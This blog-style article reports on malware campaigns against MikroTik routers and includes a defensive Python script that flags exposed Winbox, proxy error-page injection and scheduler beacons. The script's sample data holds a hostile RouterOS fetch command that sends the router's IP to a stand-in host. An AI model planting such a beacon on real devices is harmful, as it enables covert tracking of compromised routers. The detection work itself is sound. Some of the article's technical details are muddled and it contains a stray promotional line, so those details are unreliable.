
Proxy Drama: High-Security Alert on Thousands of MikroTik Routers

If you are using a router manufactured by MikroTik, contact their support team to check whether your router is one of the units affected by the malware.

This April, security researchers at China’s Netlab 360 found that thousands of routers manufactured by MikroTik, a Latvian company, carry a vulnerability. The vulnerability was easily exploited by malware, which in turn infected thousands of MikroTik router units.

MikroTik is aware of the vulnerability in its products and has released a public statement about it. To patch the vulnerability, the company shipped a software update in April, the same month the vulnerability was found.

However, thousands of their devices remain susceptible. According to China’s Netlab 360 security researchers, over 370,000 MikroTik units are still affected by the vulnerability and at high risk of malware infection once attackers find them.

True enough, devices were infected by the malware after the vulnerability was made public. The vulnerability is a matter of public record and can be found on WikiLeaks’ page for the CIA’s “Vault7” toolkit.

According to the Netlab 360 report, the attackers continue to spy on the devices; over 7,500 are currently being spied on. The attackers are actively forwarding web traffic from these devices to various remote servers.

Moreover, over 239,000 affected units were said to be accessible from a single internet address block. This is a clear threat to online security, especially since MikroTik manufactures routing and wireless hardware for internet service providers (ISPs). The company also serves businesses worldwide, building wireless backbones and outdoor fiber routers for ISPs.

Imagine the damage this vulnerability and the malware have caused. More worrisome still, the affected routers are configured with the company’s Winbox router configuration utility, which still does not have a patch.

These routers are widely distributed, which means there are still devices out there at risk of malware. Some were found in Brazil and Russia; the USA alone has over 14,000 affected devices.

Malware on MikroTik Routers

With this vulnerability out there waiting to be exploited, it is no surprise that another team of security researchers found malware campaigns against MikroTik devices.

Researchers at Trustwave found two malware campaigns against the company’s devices, targeting units in Brazil. The malware found on thousands of devices is CoinHive malware.

The CoinHive malware injects a JavaScript snippet into the error page served by the router’s web proxy. Once the script is injected, it can intercept the device’s web traffic.

Fortunately, the information, data, and traffic that the CoinHive malware collects from the devices are being blocked by an access control list (ACL). Ironically, the attackers themselves created it. This was discovered by Netlab 360 security researcher Genshen Ye.

The other malware campaign found by the Netlab 360 team turns the affected routers into a malicious proxy network. This proxy network only allows access from a single netblock; all traffic from the affected router goes to a single netblock that was traced to the United Kingdom. This is why it’s so important to read proxy reviews before you buy!

Another piece of malware that continues to plague the thousands of affected devices collects the router’s IP address. It is a scheduled task that reports the router’s IP address to the attacker, so the attacker keeps track of the device even if it is rebooted. This malware also appears to scan for other vulnerable routers.

These attacks on MikroTik’s devices are a clear challenge to the company. Will they be able to patch this problem? MikroTik has a sniffer currently working on identifying the malware and the attacker.

Meanwhile, the malware continues to affect devices. According to Netlab 360, the 7,500 routers affected by the vulnerability have already been infiltrated by malware that leaks and streams their network traffic.

Most of this traffic is FTP and email traffic, along with some traffic related to network management. The data was found to be sent to an ISP located in Belize.
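As an added illustration, not code from the article, Netlab 360 or Trustwave, the following Python script checks a RouterOS configuration export for the three indicators the article describes: Winbox reachable from any address, the web proxy enabled with a custom error page, and a scheduler entry that fetches an external URL. The export text and the 203.0.113.10 address are constructed sample data, not values from a real device.

```python
import re

# Constructed sample of a RouterOS "/export" (not from the article or any real device).
SAMPLE_EXPORT = """\
/ip service
set winbox address=0.0.0.0/0
set www disabled=yes
/ip proxy
set enabled=yes error-page=error.html
/system scheduler
add name=U6 interval=10m on-event="/tool fetch url=http://203.0.113.10/beacon.php?ip=[/ip address get 0 address] mode=http"
add name=backup interval=1d on-event="/system backup save name=daily"
"""

def parse_sections(export_text):
    """Group the lines of a RouterOS export under their '/path' menu header."""
    sections, current = {}, None
    for line in export_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            current = line
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections

def find_indicators(export_text):
    """Return (indicator, line) pairs for the three behaviours described in the article."""
    findings = []
    sections = parse_sections(export_text)
    # 1. Winbox enabled with no address restriction, or open to 0.0.0.0/0.
    for line in sections.get("/ip service", []):
        if "winbox" in line and "disabled=yes" not in line:
            m = re.search(r"address=(\S+)", line)
            if not m or m.group(1) in ("0.0.0.0/0", '""'):
                findings.append(("winbox-exposed", line))
    # 2. Web proxy enabled with a custom error page (the CoinHive injection vector).
    for line in sections.get("/ip proxy", []):
        if "enabled=yes" in line and "error-page=" in line:
            findings.append(("proxy-error-page", line))
    # 3. Scheduler task that fetches an external URL (IP beacon that survives reboots).
    for line in sections.get("/system scheduler", []):
        if "/tool fetch" in line and re.search(r'url="?https?://', line):
            findings.append(("scheduler-fetch", line))
    return findings

if __name__ == "__main__":
    for kind, line in find_indicators(SAMPLE_EXPORT):
        print(f"[{kind}] {line}")
```

Run it against the output of `/export` from a device to list which of the three indicators are present; a clean device returns an empty list.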

MikroTik’s Move to Patch the Vulnerability

According to one of MikroTik’s regional ISP employees, once MikroTik learned of the vulnerability, it immediately pushed a patch through its homegrown update system. However, this update alone is not enough: routers remain affected.

With this kind of vulnerability in its products, MikroTik needs to be strict and serious about its security standards and look for other ways to address its shortcomings. If it fails to resolve this vulnerability as soon as possible, many people and large businesses will be affected and millions in damages will follow.

There are many attackers out there, and if they learn of this and find a way to infiltrate these devices with malicious code, it is a major threat to the online security of MikroTik’s millions of users.

Their Winbox product, which is said to be the target of the exploit, also needs to be looked at very carefully. One of MikroTik’s standard practices for avoiding vulnerabilities in its systems and devices is to shut down all unnecessary services on the units once deployed, Winbox included.

However, this standard deployment practice should be examined closely. They should also adopt other security practices to ensure that what they deliver to customers is vulnerability-free and unhackable.

So if you are using a MikroTik router, check with their support department whether your router is one of the affected devices, and ask what the best course of action is in this situation.


Elizabeth Kelly